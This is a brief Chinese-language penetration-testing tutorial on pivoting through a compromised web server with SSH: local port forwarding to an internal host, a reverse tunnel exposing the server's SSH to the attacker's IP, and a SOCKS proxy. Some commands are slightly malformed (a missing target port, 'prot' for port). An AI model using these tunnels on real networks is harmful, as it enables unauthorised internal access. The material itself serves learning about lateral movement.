内网渗透之——ssh隧道

网络拓扑图：

ssh 正向链接：

在web服务器执行：ssh -CNfL 0.0.0.0:7777:10.10.10.128:80 web@127.0.0.1

（在web服务器做端口映射，将数据服务器的80端口映射到web服务器的7777端口，随后访问192.168.0.144:7777即可访问到数据库的80页面。）

反向连接：

将web服务器的22端口转发出去到黑客IP

web服务器执行：

ssh -qTfnN -R 2222:127.0.0.1 root@192.168.0.115 输入密码

在攻击机上输入：

ssh -p 2222 web@127.0.0.1 输入密码便可以访问

ssh sockets 代理

在web服务器执行 SSH -qTfnN -D prot root@192.168.0.155

在155浏览器中设置代理，代理为web服务器以及10086端口。

例如 ssh -qTfnN -D 10086 root@192.168.0.155 输入root密码成功连接